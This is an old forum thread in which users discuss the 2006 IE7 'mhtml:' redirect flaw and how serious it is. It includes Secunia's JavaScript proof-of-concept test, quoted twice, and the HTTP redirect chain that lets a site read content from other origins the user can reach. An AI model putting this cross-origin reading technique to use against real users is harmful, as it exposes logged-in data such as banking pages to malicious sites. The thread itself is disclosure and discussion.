IE7 Vulnerability Released

[iago]

http://www.infosecnews.org/pipermail/isn/2006-October/013774.html

Apparently it's vulnerable to cross-site scripting attacks, by the sounds of it.  Not major, but can be dangerous for phishing attacks. 

INSECURITY FIRM  Secunia, has already found an insecurity in newly
unleashed IE7

The vulnerability can be exploited to disclose potentially sensitive
information the firm says, though it gives it just two out of five on
its criticality meter.

An exasperated Thomas Kristensen, CTO of Secunnia says, "It is the
half-year old information disclosure vulnerability which allows
malicious sites to sneak on the content of other sites which hasn't been
patched in the brand new IE7 release."

The vulnerability is caused due to an error in the handling of
redirections for URLs with the "mhtml:" URI handler. This can be
exploited to access documents served from another web site, the firm
notes, here.,[1]

The firm posted an online demonstration, of the vulnerability here [2].

[1] http://secunia.com/advisories/22477/
[2] http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/

[Warrior]

http://blogs.technet.com/msrc/archive/2006/10/19/information-on-reports-of-ie-7-vulnerability.aspx

MS response

[iago]

Well, it may not be directly attacking IE7, but it's still a way to compromise you through IE7. 

I just like the timing, the day after it's released

[MyndFyre]

I just like the timing, the day after it's released

Of course you do; I'm sure Secunia does too.  This "exploit" has obviously been part of IE7 since the beta.  Why hasn't anyone mentioned it up until this point?  Oh yeah - so Microsoft can have egg on their face.

I'm trying to figure out why this is important.

Code: [Select]

<script language="JavaScript">
var request;
var tmp;

function StartTest()
{
  // Start XML HTTP Request Object
  InitXMLHttpRequest();

  // Open/
  request.open('GET', 'http://secu'+'nia.com/ie_redir_test_1/?' + Math.random(), true);

  // Response Handler
  request.onreadystatechange = function()
  {
     // Check if state is '4'
     if ( request.readyState == 4 )
    {
      // Tmp
      tmp = request.responseText;

      document.getElementById('start').innerHTML = '<a href="javascript:StartTest();"><font color="#000000">Run Test Again - Left Click On This Link</font></a>';

     if ( tmp.match(/news.google/) )
     {
       document.getElementById('result').innerHTML = '<font color="red">Your browser is vulnerable! The test retrieved content from news.google.com in the context of your browser.<br><br>This actually means that if you were logged into your bank account, any web site you are visiting would be able to retrieve confidential data from your bank. This could also be used to retrieve personal settings entered on sites like eBay or Paypal.<br><br><a href="javascript:ViewContent();">View Retrieved Content</a></font>';
       alert('Your browser is vulnerable!');
     }
     else
     {
       document.getElementById('result').innerHTML = 'Your browser does not appear to vulnerable to this particular exploit.';
      alert('Your browser does not appear to vulnerable to this particular exploit.');
     }
 }
}

// Make the request
request.send(null);

// Display status
document.getElementById('start').innerHTML = 'The test is running. Please wait.';
document.getElementById('result').innerHTML = 'The test is running. Please wait while the test finishes, this may take a few seconds.';
}

// Function for viewing retrieved content (source)
function ViewContent()
{
 o = open('', 'new');
 o.document.body.innerHTML = tmp;
}

// Function for Initialising the XMLHttpRequest
function InitXMLHttpRequest()
{
try
{
 request = new XMLHttpRequest();
} catch (trymicrosoft)
 {
 try
 {
  request = new ActiveXObject("Msxml2.XMLHTTP");
 }
 catch (othermicrosoft)
 {
  try
  {
   request = new ActiveXObject("Microsoft.XMLHTTP");
  }
  catch (failed)
  {
   request = false;
  }
 }
}

// Initialised?
if ( !request )
{
 alert("Due to limitations of your browser you will not be able to use this page.");
}
}

</script>

I guess I'm just saying that if you're already at the site that's exploiting you....

[iago]

Of course you do; I'm sure Secunia does too.  This "exploit" has obviously been part of IE7 since the beta.  Why hasn't anyone mentioned it up until this point?  Oh yeah - so Microsoft can have egg on their face.

They have been, and I seem to remember seeing a few (though they may not have been Secunia -- I don't pay much attention to IE vulns, I only saw this because somebody posted it to fun-sec).  Secunia is a security research company, there's no benefit for them to screw Microsoft or anybody else.

I'm trying to figure out why this is important.

Code: [Select]

<script language="JavaScript">
var request;
var tmp;

function StartTest()
{
  // Start XML HTTP Request Object
  InitXMLHttpRequest();

  // Open/
  request.open('GET', 'http://secu'+'nia.com/ie_redir_test_1/?' + Math.random(), true);

  // Response Handler
  request.onreadystatechange = function()
  {
     // Check if state is '4'
     if ( request.readyState == 4 )
    {
      // Tmp
      tmp = request.responseText;

      document.getElementById('start').innerHTML = '<a href="javascript:StartTest();"><font color="#000000">Run Test Again - Left Click On This Link</font></a>';

     if ( tmp.match(/news.google/) )
     {
       document.getElementById('result').innerHTML = '<font color="red">Your browser is vulnerable! The test retrieved content from news.google.com in the context of your browser.<br><br>This actually means that if you were logged into your bank account, any web site you are visiting would be able to retrieve confidential data from your bank. This could also be used to retrieve personal settings entered on sites like eBay or Paypal.<br><br><a href="javascript:ViewContent();">View Retrieved Content</a></font>';
       alert('Your browser is vulnerable!');
     }
     else
     {
       document.getElementById('result').innerHTML = 'Your browser does not appear to vulnerable to this particular exploit.';
      alert('Your browser does not appear to vulnerable to this particular exploit.');
     }
 }
}

// Make the request
request.send(null);

// Display status
document.getElementById('start').innerHTML = 'The test is running. Please wait.';
document.getElementById('result').innerHTML = 'The test is running. Please wait while the test finishes, this may take a few seconds.';
}

// Function for viewing retrieved content (source)
function ViewContent()
{
 o = open('', 'new');
 o.document.body.innerHTML = tmp;
}

// Function for Initialising the XMLHttpRequest
function InitXMLHttpRequest()
{
try
{
 request = new XMLHttpRequest();
} catch (trymicrosoft)
 {
 try
 {
  request = new ActiveXObject("Msxml2.XMLHTTP");
 }
 catch (othermicrosoft)
 {
  try
  {
   request = new ActiveXObject("Microsoft.XMLHTTP");
  }
  catch (failed)
  {
   request = false;
  }
 }
}

// Initialised?
if ( !request )
{
 alert("Due to limitations of your browser you will not be able to use this page.");
}
}

</script>

I guess I'm just saying that if you're already at the site that's exploiting you....

Did you look at http://secunia.com/ie_redir_test_1?

ie_redir_test_1 returns:

HEAD /ie_redir_test_1 HTTP/1.0
Host: secunia.com

HTTP/1.1 302 Found
Date: Fri, 20 Oct 2006 12:23:47 GMT
Server: Apache
Location: mhtml:http://secunia.com/ie_redir_test_2
Connection: close
Content-Type: text/html

ie_redir_test_2 returns:

HEAD /ie_redir_test_2 HTTP/1.0
Host: secunia.com

HTTP/1.1 302 Found
Date: Fri, 20 Oct 2006 12:24:17 GMT
Server: Apache
Location: http://news.google.com/
Connection: close
Content-Type: text/html

And apparently, the Google link is followed in the background.

What's that mean? 

It means that any site you go to can download any specific site you've logged in to.  That includes banks, forums, etc.  So yes, it's dangerous. 

[MyndFyre]

And apparently, the Google link is followed in the background.

What's that mean? 

It means that any site you go to can download any specific site you've logged in to.  That includes banks, forums, etc.  So yes, it's dangerous. 

I'm still not quite sure how.  I understand how it works.  What I don't understand is - what bank site are you going to visit that's going to have a malicious link? 

[iago]

John wonders what his account balance is.  He visits joesbank.com, pays off his credit card, then decides to search for something.  He clicks on his addressbar without logging out of the bank site and types in www.goggle.com, which can go back and access the banking site he was at.

I wouldn't be surprised if this works across tabs, but I'm not sure yet.

[MyndFyre]

I wouldn't be surprised if this works across tabs, but I'm not sure yet.

It wouldn't work across tabs, since each tab has its own DOM object, and the scripting can't cross tabs.

[iago]

I wouldn't be surprised if this works across tabs, but I'm not sure yet.

It wouldn't work across tabs, since each tab has its own DOM object, and the scripting can't cross tabs.

It's not about scripting, though, it's about having logged into a site (with cookies and whatnot) at some point in the session. 

The script takes advantage of a problem that allows the script to read a web page that the user currently has access to.  Whether the page is restricted by IP or authenticated, doesn't matter.  It doesn't have to be in their "history" or anything like that, as long as the user can get to it. 

[Warrior]

I do believe IE7 is still at fault for being used as an attack vector but the exploit isn't specifically from IE7. They should both fix the bug in IE7 which makes it an attack vector and patch the exploit in Outlook.

[iago]

I do believe IE7 is still at fault for being used as an attack vector but the exploit isn't specifically from IE7. They should both fix the bug in IE7 which makes it an attack vector and patch the exploit in Outlook.

The question is, will they?

Maybe they've changed their practices, but traditionally they'd just fix one until another bug came out